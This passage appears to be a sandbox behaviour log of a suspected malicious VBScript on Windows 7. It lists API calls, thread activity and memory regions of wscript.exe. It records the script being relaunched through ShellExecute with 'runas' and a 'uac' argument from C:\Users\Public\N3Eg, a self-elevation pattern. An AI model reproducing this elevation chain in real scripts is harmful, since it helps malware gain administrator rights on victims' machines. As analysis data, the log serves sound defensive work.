pDispParams=0x2aef18*(rgvarg=([0]=0x2aee54*(varType=0x2, wReserved1=0x2a, wReserved2=0x3e80, wReserved3=0x36, varVal1=0xe0001, varVal2=0x6c4c18bb), [1]=0x2aee64*(varType=0x8, wReserved1=0x0, wReserved2=0x43d8, wReserved3=0x36, varVal1="runas", varVal2=0x6c4c18bb), [2]=0x2aee74*(varType=0x8, wReserved1=0x0, wReserved2=0x43d8, wReserved3=0x36, varVal1="", varVal2=0x6c4c18bb), [3]=0x2aee84*(varType=0x8, wReserved1=0x4651, wReserved2=0x4654, wReserved3=0x464b, varVal1="\"C:\\Users\\Public\\N3Eg\\N3E.vbs\" uac", varVal2=0x46574646), [4]=0x2aee94*(varType=0x8, wReserved1=0x0, wReserved2=0x43d8, wReserved3=0x36, varVal1="wscript.exe", varVal2=0x6c4c1684)), rgdispidNamedArgs=0x0, cArgs=0x5, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x2aeef4*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2aef38*=0xe0640) returned 0x0 [0226.055] IUnknown:Release (This=0xe0640) returned 0x1 [0226.056] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.056] GetTickCount () returned 0x3fe3b [0226.056] MsgWaitForMultipleObjects (nCount=0x0, pHandles=0x0, fWaitAll=1, dwMilliseconds=0x3e8, dwWakeMask=0x1ff) returned 0x102 [0227.092] PeekMessageA (in: lpMsg=0x2aec6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2aec6c) returned 0 [0227.092] GetTickCount () returned 0x40231 [0227.092] MsgWaitForMultipleObjects (nCount=0x0, pHandles=0x0, fWaitAll=1, dwMilliseconds=0x3e8, dwWakeMask=0x1ff) returned 0x102 [0228.156] PeekMessageA (in: lpMsg=0x2aec6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2aec6c) returned 0 [0228.156] GetTickCount () returned 0x40646 [0228.156] MsgWaitForMultipleObjects (nCount=0x0, pHandles=0x0, fWaitAll=1, dwMilliseconds=0x3e8, dwWakeMask=0x1ff) returned 0x102 [0229.323] PeekMessageA (in: lpMsg=0x2aec6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2aec6c) returned 0 [0229.323] GetTickCount () returned 0x40a4c [0229.323] MsgWaitForMultipleObjects (nCount=0x0, pHandles=0x0, fWaitAll=1, dwMilliseconds=0x3e8, dwWakeMask=0x1ff) Thread: id = 87 os_tid = 0xf30 Thread: id = 88 os_tid = 0xf34 [0222.583] GetClassInfoA (in: hInstance=0x80000, lpClassName="WSH-Timer", lpWndClass=0x1a1fc40 | out: lpWndClass=0x1a1fc40) returned 0 [0222.584] RegisterClassA (lpWndClass=0x1a1fc40) returned 0x2ac111 [0222.584] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x80000, lpParam=0x3623e0) returned 0x1016a [0222.584] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 0 [0222.584] DefWindowProcA (hWnd=0x1016a, Msg=0x24, wParam=0x0, lParam=0x1a1f844) returned 0x0 [0222.584] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 0 [0222.584] SetWindowLongA (hWnd=0x1016a, nIndex=-21, dwNewLong=3548128) returned 0 [0222.584] DefWindowProcA (hWnd=0x1016a, Msg=0x81, wParam=0x0, lParam=0x1a1f82c) returned 0x1 [0222.586] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0222.586] DefWindowProcA (hWnd=0x1016a, Msg=0x83, wParam=0x0, lParam=0x1a1f864) returned 0x0 [0222.590] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0222.590] DefWindowProcA (hWnd=0x1016a, Msg=0x1, wParam=0x0, lParam=0x1a1f82c) returned 0x0 [0222.590] SetEvent (hEvent=0xcc) returned 1 [0222.667] GetMessageA (lpMsg=0x1a1fc68, hWnd=0x1016a, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0230.098] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.098] DefWindowProcA (hWnd=0x1016a, Msg=0x3b, wParam=0x4000058e, lParam=0x0) returned 0x1 [0230.098] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.099] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.099] DefWindowProcA (hWnd=0x1016a, Msg=0x46, wParam=0x0, lParam=0x1a1fbd4) returned 0x0 [0230.099] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.099] DefWindowProcA (hWnd=0x1016a, Msg=0x47, wParam=0x0, lParam=0x1a1fbd4) returned 0x0 [0230.099] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.099] DefWindowProcA (hWnd=0x1016a, Msg=0xd, wParam=0x208, lParam=0x1a1ef88) returned 0x0 [0230.100] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.100] DefWindowProcA (hWnd=0x1016a, Msg=0x83, wParam=0x1, lParam=0x1a1f7d0) returned 0x0 [0230.100] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.100] DefWindowProcA (hWnd=0x1016a, Msg=0x1c, wParam=0x1, lParam=0x4c8) returned 0x0 [0230.100] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.100] DefWindowProcA (hWnd=0x1016a, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0230.101] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.101] DefWindowProcA (hWnd=0x1016a, Msg=0xd, wParam=0x208, lParam=0x1a1ee88) returned 0x0 [0230.101] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.101] DefWindowProcA (hWnd=0x1016a, Msg=0xd, wParam=0x208, lParam=0x1a1eee8) returned 0x0 [0230.101] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.101] DefWindowProcA (hWnd=0x1016a, Msg=0x6, wParam=0x1, lParam=0x0) returned 0x0 [0230.104] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.104] DefWindowProcA (hWnd=0x1016a, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0230.106] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.106] DefWindowProcA (hWnd=0x1016a, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0230.106] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.106] DefWindowProcA (hWnd=0x1016a, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0230.106] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 [0230.106] DefWindowProcA (hWnd=0x1016a, Msg=0x3b, wParam=0x4000058c, lParam=0x0) returned 0x2 [0230.106] GetWindowLongA (hWnd=0x1016a, nIndex=-21) returned 3548128 Thread: id = 89 os_tid = 0xf38 Thread: id = 90 os_tid = 0xf3c Thread: id = 91 os_tid = 0xf40 Thread: id = 92 os_tid = 0xf44 Thread: id = 93 os_tid = 0xf48 Process: id = "7" image_name = "wscript.exe" filename = "c:\\windows\\system32\\wscript.exe" page_root = "0x7f09e4c0" os_pid = "0x494" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xf28" cmd_line = "\"C:\\Windows\\System32\\wscript.exe\" \"C:\\Users\\Public\\N3Eg\\N3E.vbs\" uac" cur_dir = "C:\\Windows\\system32\\" Region: id = 1042 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1043 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1044 start_va = 0x80000 end_va = 0xa5fff entry_point = 0x82f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\System32\\wscript.exe" Region: id = 1045 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1046 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1047 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1048 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1049 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1050 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1051 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1052 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1053 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1054 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1055 start_va = 0x748a0000 end_va = 0x748a8fff entry_point = 0x748a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 1056 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1057 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1058 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1059 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 1060 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1061 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1062 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1063 start_va = 0x76ee0000 end_va = 0x76f6efff entry_point = 0x76ee3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 1064 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1065 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1066 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1067 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1068 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1069 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1070 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1071 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 1072 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1073 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1074 start_va = 0x50000 end_va = 0x52fff entry_point = 0x50000 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\System32\\en-US\\wscript.exe.mui" Region: id = 1075 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1076 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1077 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1078 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1079 start_va = 0x752a0000 end_va = 0x752abfff entry_point = 0x752a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 1080 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1081 start_va = 0x74090000 end_va = 0x740cffff entry_point = 0x7409a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 1082 start_va = 0x1200000 end_va = 0x12defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1083 start_va = 0x1310000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 1084 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1085 start_va = 0x120000 end_va = 0x12efff entry_point = 0x122f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\System32\\wscript.exe" Region: id = 1086 start_va = 0x1410000 end_va = 0x16defff entry_point = 0x1410000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 1087 start_va = 0x752b0000 end_va = 0x7530efff entry_point = 0x752b2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" Region: id = 1088 start_va = 0x1770000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1089 start_va = 0x73da0000 end_va = 0x73db2fff entry_point = 0x73da1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" Region: id = 1090 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1091 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1092 start_va = 0x76e20000 end_va = 0x76ea2fff entry_point = 0x76e223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 1093 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1094 start_va = 0x6c4c0000 end_va = 0x6c52afff entry_point = 0x6c4c1409 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\System32\\vbscript.dll" Region: id = 1095 start_va = 0x753c0000 end_va = 0x753cbfff entry_point = 0x753c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 1096 start_va = 0x753d0000 end_va = 0x754ecfff entry_point = 0x753d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 1097 start_va = 0x75560000 end_va = 0x7558cfff entry_point = 0x7556296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" Region: id = 1098 start_va = 0x74bc0000 end_va = 0x74bfafff entry_point = 0x74bc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 1099 start_va = 0x74e20000 end_va = 0x74e35fff entry_point = 0x74e22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 1100 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1101 start_va = 0x1990000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 1102 start_va = 0x6dd30000 end_va = 0x6dd37fff entry_point = 0x6dd33bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" Region: id = 1103 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1104 start_va = 0x1a90000 end_va = 0x1e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a90000" filename = "" Region: id = 1105 start_va = 0x1f80000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1106 start_va = 0x6c1c0000 end_va = 0x6c243fff entry_point = 0x6c1c19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" Region: id = 1107 start_va = 0x6db10000 end_va = 0x6db25fff entry_point = 0x6db113df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" Region: id = 1108 start_va = 0x759e0000 end_va = 0x76629fff entry_point = 0x75a61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 1109 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 1110 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1111 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1112 start_va = 0x6dae0000 end_va = 0x6db0cfff entry_point = 0x6dae1351 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" Region: id = 1113 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1114 start_va = 0x1870000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 1115 start_va = 0x6dab0000 end_va = 0x6dad9fff entry_point = 0x6dab13f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" Region: id = 1116 start_va = 0x260000 end_va = 0x274fff entry_point = 0x2613f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" Region: id = 1117 start_va = 0x6c420000 end_va = 0x6c440fff entry_point = 0x6c42e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" Region: id = 1118 start_va = 0x72080000 end_va = 0x72091fff entry_point = 0x72081200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" Region: id = 1127 start_va = 0x280000 end_va = 0x28bfff entry_point = 0x28e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" Region: id = 1128 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1129 start_va = 0x11a0000 end_va = 0x11a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 1130 start_va = 0x12e0000 end_va = 0x12e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012e0000" filename = "" Region: id = 1131 start_va = 0x2160000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1132 start_va = 0x6e6a0000 end_va = 0x6f11ffff entry_point = 0x6e6a6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" Region: id = 1133 start_va = 0x71af0000 end_va = 0x71b3bfff entry_point = 0x71af2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" Region: id = 1134 start_va = 0x72190000 end_va = 0x721cbfff entry_point = 0x72193089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" Region: id = 1135 start_va = 0x74110000 end_va = 0x742adfff entry_point = 0x7413e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 1136 start_va = 0x745a0000 end_va = 0x74694fff entry_point = 0x745b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 1137 start_va = 0x76890000 end_va = 0x76a8afff entry_point = 0x768922d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" Region: id = 1138 start_va = 0x77360000 end_va = 0x77364fff entry_point = 0x77361438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 1139 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1140 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x11b0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" Region: id = 1141 start_va = 0x12f0000 end_va = 0x12f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 1142 start_va = 0x75650000 end_va = 0x75744fff entry_point = 0x75651865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" Region: id = 1143 start_va = 0x770c0000 end_va = 0x771f5fff entry_point = 0x770c1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" Region: id = 1144 start_va = 0x23f0000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 1145 start_va = 0x754f0000 end_va = 0x75501fff entry_point = 0x754f1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 1146 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x755958b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 1147 start_va = 0x766f0000 end_va = 0x7688cfff entry_point = 0x766f17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 1148 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1149 start_va = 0x24f0000 end_va = 0x28e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024f0000" filename = "" Region: id = 1150 start_va = 0x739c0000 end_va = 0x739e0fff entry_point = 0x739c145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 1151 start_va = 0x757d0000 end_va = 0x75814fff entry_point = 0x757d11e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 1152 start_va = 0x16e0000 end_va = 0x16fcfff entry_point = 0x16e0000 region_type = mapped_file name = "{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" Region: id = 1153 start_va = 0x1700000 end_va = 0x1700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 1154 start_va = 0x75350000 end_va = 0x7535afff entry_point = 0x75351992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 1155 start_va = 0x1300000 end_va = 0x1303fff entry_point = 0x1300000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1156 start_va = 0x1710000 end_va = 0x173ffff entry_point = 0x1710000 region_type = mapped_file name = "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" Region: id = 1157 start_va = 0x1740000 end_va = 0x1743fff entry_point = 0x1740000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1158 start_va = 0x1e90000 end_va = 0x1ef5fff entry_point = 0x1e90000 region_type = mapped_file name = "{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" Region: id = 1159 start_va = 0x75280000 end_va = 0x7529afff entry_point = 0x752893b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 1192 start_va = 0x1750000 end_va = 0x1750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 1193 start_va = 0x1760000 end_va = 0x1760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001760000" filename = "" Region: id = 1194 start_va = 0x2280000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1195 start_va = 0x748b0000 end_va = 0x74925fff entry_point = 0x748b760e region_type = mapped_file name = "FirewallAPI.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" Region: id = 1196 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1252 start_va = 0x1970000 end_va = 0x197afff entry_point = 0x197760e region_type = mapped_file name = "FirewallAPI.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" Region: id = 1253 start_va = 0x1980000 end_va = 0x1983fff entry_point = 0x1980000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" Region: id = 1254 start_va = 0x2080000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Thread: id = 96 os_tid = 0x8c0 [0226.103] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25fcd0 | out: lpSystemTimeAsFileTime=0x25fcd0*(dwLowDateTime=0xe1bffbe0, dwHighDateTime=0x1d204ef)) [0226.103] GetCurrentProcessId () returned 0x494 [0226.103] GetCurrentThreadId () returned 0x8c0 [0226.103] GetTickCount () returned 0x3fe6a [0226.103] QueryPerformanceCounter (in: lpPerformanceCount=0x25fcc8 | out: lpPerformanceCount=0x25fcc8*=16438680283817) returned 1 [0226.104] GetStartupInfoA (in: lpStartupInfo=0x25fce4 | out: lpStartupInfo=0x25fce4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wscript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0226.106] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0226.106] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0226.106] GetVersionExA (in: lpVersionInformation=0x25fbf4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x25fb44, dwBuildNumber=0x0, dwPlatformId=0x25fd64, szCSDVersion="íà!w|\x9a\x0b") | out: lpVersionInformation=0x25fbf4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.106] GetUserDefaultLCID () returned 0x409 [0226.107] CoInitialize (pvReserved=0x0) returned 0x0 [0226.121] GetCommandLineW () returned="\"C:\\Windows\\System32\\wscript.exe\" 